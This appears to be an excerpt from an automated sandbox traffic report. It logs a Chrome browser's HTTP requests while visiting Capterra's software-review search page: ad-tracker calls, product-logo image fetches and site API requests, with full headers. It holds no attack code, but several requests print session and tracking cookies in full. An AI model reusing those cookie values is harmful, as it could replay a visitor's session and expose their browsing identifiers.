        Source: global trafficHTTP traffic detected: GET /activityi;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /fsrelay/s/settings/18VAT4/v1/web HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-000000000000000004d44f21d9817fc6-20ded07572ba4bf6-01sec-ch-ua-mobile: ?0x-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1x-datadog-trace-id: 347990078016028614x-datadog-parent-id: 2368559656898022390sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e60c0fa1-f0d4-40ac-a412-0b2261b1f9a0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/44e20468-ea22-4d70-9132-b88c151348b5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/82a342f4-1d08-4265-877a-83f0d7b3858f.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/3f97e69e-54a0-4b38-95b7-c226481cff4c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /activityi;dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034620739&cv=11&fst=1725034620739&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /static/logos/capterra-logo.svg HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=88145&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: GET /messenger/web/metrics HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e1b492c5-8a97-4b86-a422-d317b2480afa.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5179d6b3-aa3f-403b-8cb4-718850815472.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/b0bf7e60-e572-4090-8dd8-0e950b0ad16d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/s/fs.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /fsrelay/s/settings/18VAT4/v1/web HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/db285424-c32d-461f-9382-c24a52b4c2ef.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/a5d35bcd-e674-49ae-b851-7c2579a7969f.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
